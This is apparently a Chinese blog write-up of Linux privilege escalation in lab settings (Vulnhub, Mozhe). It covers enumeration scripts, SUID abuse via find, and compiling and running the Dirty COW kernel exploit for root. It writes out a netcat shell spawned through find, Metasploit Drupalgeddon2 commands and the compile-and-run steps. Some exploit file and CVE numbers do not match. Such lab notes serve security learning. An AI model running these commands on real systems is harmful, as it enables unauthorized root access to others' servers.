权限提升-Linux脏牛内核漏洞&SUID&信息收集

权限提升-Linux脏牛内核漏洞&SUID&信息收集_第1张图片权限提升-Linux脏牛内核漏洞&SUID&信息收集_第2张图片

一、Linux 提权自动化脚本利用-4 个脚本

两个信息收集:LinEnum,linuxprivchecker
两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2
需要解释:信息收集有什么用哦?漏洞探针又有什么用哦

LinEnum信息收集
通过webshell把LinEnum可执行文件上传到对方服务器中的tmp目录
因为tmp目录是linux服务器中的临时目录,重启后tmp目录会清空,所以这个目录一般都是可读取执行的

通过webshell执行LinEnum.sh文件,如果不能执行,用chmod赋予权限
执行后,会对对方的服务器信息进行检测,可判断是否能通过SUID进行提权
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第3张图片
linuxprivchecker信息收集
通过webshell将py文件上传到对方服务器直接通过python运行即可(对方服务器需要有python环境)
在这里插入图片描述
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第4张图片
linux-exploit-suggester提权
上传到对方服务器后直接执行即可,如果不能执行用chmod赋予权限
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第5张图片
linux-exploit-suggester2提权
上传到对方服务器后通过perl执行即可,需要对方服务器上有perl环境
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第6张图片

二、什么是SUID提权

SUID就是设置拥有创建文件的用户的身份的其他用户身份,意思是你和创建文件的所有者一样的身份权限。

通过chmod u+s 给文件设置suid
设置完suid后,你就有对此文件的所有权限

权限提升-Linux脏牛内核漏洞&SUID&信息收集_第7张图片
如何判断是否有suid提权,可通过上述两个脚本去判断

三、SUID提权演示

首先通过webshell把LinEnum.sh上传到对方服务器tmp目录

用msf来监听本地的5577端口
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第8张图片
通过冰蝎将会话反弹到自己msf服务器的5577端口上
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第9张图片msf成功接收到会话
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第10张图片
msf执行shell会话
在这里插入图片描述
进入tmp目录,给LinEnum.sh赋予执行权限,并执行
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第11张图片
查看LinEnum.sh执行后返回的信息是否有可产生shell的程序
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第12张图片
也可以直接通过命令find / -perm -u=s -type f 2>/dev/null查看具有root用户权限的SUID文件
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第13张图片

可进行suid提权产利用生shell的程序:nmap,vim,less,more,nano,cp,mv,find

发现find,此处可借助find进行提权

参考:https://pentestlab.blog/2017/09/25/suid-executables/
touch hwj 
创建文件夹

find hwj -exec whoami \;
通过find执行whoami命令,因为这里给find服务设置了suid,所以毫无疑问是通过创建find的用户的权限去执行的whoami,也就是通过root的权限去执行的

find hwj -exec netcat -lvp 5555 -e /bin/sh \;
将会话反弹到5555端口

netcat xx.xx.xx.xx 5555
通过netcat去连接msf的5555端口

四、Linux 提权本地配合内核漏洞演示-Mozhe

通过上传linux-exploit-suggester2并执行,列出相应的漏洞列表,对应选择exp执行

提权过程:连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG
gcc 45010.c -o 45010
chmod +x 45010
./45010
id

权限提升-Linux脏牛内核漏洞&SUID&信息收集_第14张图片

五、Linux 提权脏牛内核漏洞演示-Aliyun,Vulnhub

运行Vulnhub

通过nmap扫描确认目标ip
在这里插入图片描述
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第15张图片
扫描目标ip的开放端口,发现1898端口
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第16张图片
对目标端口进行访问,发现是cms
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第17张图片
打开msf搜素drupal相关的漏洞,因为不浪费时间事先知道要用哪个,如果不知道的话可以一个一个尝试
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第18张图片
进入对应的漏洞模块,show options显示需要设置哪些参数
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第19张图片设置目标地址以及目标的对应端口,执行,成功反弹会话

权限提升-Linux脏牛内核漏洞&SUID&信息收集_第20张图片getuid查看权限,此时就可以进行提权操作了
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第21张图片通过msf把提权的脚本上传到对方服务器的tmp目录
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第22张图片
进入shell会话(shell会话是单纯的linux命令,比较方便)
切换到tmp目录,赋予脚本执行的权限,并执行
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第23张图片
执行后返回对方服务器可能存在的提权的漏洞信息,这里我们就选用CVE-2016-5795进行提权
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第24张图片
可以直接在反弹的会话用wget下载exp到对方服务器tmp目录,也可以下载到本地通过msf上传
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第25张图片退出shell会话,通过msf把本地的exp上传到对方的tmp目录中
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第26张图片

上传到对方tmp目录后,通过g++编译上传的40847.cpp文件,也就是exp
编译后查看结果,dcow为编译后的文件
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第27张图片
开启交互式(我也不知道这是什么鸟毛东西,反正就是需要)python -c 'import pty; pty.spawn("/bin/bash")'

然后通过交互回显的会话直接执行dcow文件

下面返回信息,生成root用户的密码(此处不是直接更改root用户密码的意思,是用这个密码也可以登陆root)
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第28张图片
生成密码后直接切换root用户,并输入生成的密码
成功登陆root,提权成功
权限提升-Linux脏牛内核漏洞&SUID&信息收集_第29张图片
芜湖~~

nmap 192.168.76.0/24
nmap -p1-65535 192.168.76.141
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.76.141
set lport 1898
set target 0
run
upload /tmp/40837.cpp /tmp/40837.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow

你可能感兴趣的:(渗透笔记2,安全,服务器,linux)